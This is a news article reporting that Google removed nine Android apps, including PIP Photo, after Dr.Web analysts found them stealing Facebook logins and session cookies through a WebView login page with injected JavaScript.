Google removed nine Android Apps from the Play Store, including the one with millions of users, after it was discovered that it was stealing confidential user login information on Facebook. However, those left on the phones are still working and continue to cause a problem to millions of users without their knowledge.
Discovered and described in detail on July 1 by malware analysts at Dr.Web, the applications, described as a theft trojan, have been circulated as harmless software and have been installed nearly 6 million times. Unlike some previous cases when malicious Android applications were detected, all applications, in this case, provided legitimate services such as photo editing and framing, training and fitness, horoscopes, and garbage removal.
These Nine Android Apps are stealing Facebook Password
Applications include PIP Photo with up to 5 million installations; Processing Photo with up to 500,000 installations; Rubbish Cleaner, Horoscope Daily and Inwell Fitness with up to 100,000 installations; and App Lock Keep with up to 50,000 installs. Lockit Master, Horoscope Pi, and App Lock Manager rounded out the list.
In this case, users are offered the option to disable in-app ads by logging in to their Facebook account. Analysts noted that ads were indeed present in some applications and that this maneuver wanted to further encourage Android device owners to take the necessary actions.
Users of the applications who selected the option were then presented with standard Facebook login information, but with a difference. The original Facebook login page was displayed in a WebView with JavaScript also loaded to steal the login credentials entered.
If users entered their login details on Facebook, JavaScript would then send credentials to the server, while users would know nothing about it, as they have successfully logged in to Facebook. After the victims logged into their accounts, the Trojan also stole cookies from the current authorization sessions.
Although those behind the apps targeted Facebook accounts, they could also target accounts on other services. The attackers could easily change the settings of the Trojans and order them to load the ‘website of another legitimate service, the analysts explained. That way, Trojans could be used to steal logins and passwords from any service.
Google has not yet made a public statement about the apps, although it has been noticed that the apps have been removed from the store. In addition to the apps, the teams that made them were expelled from the Google Play Store.
Source: arstechnica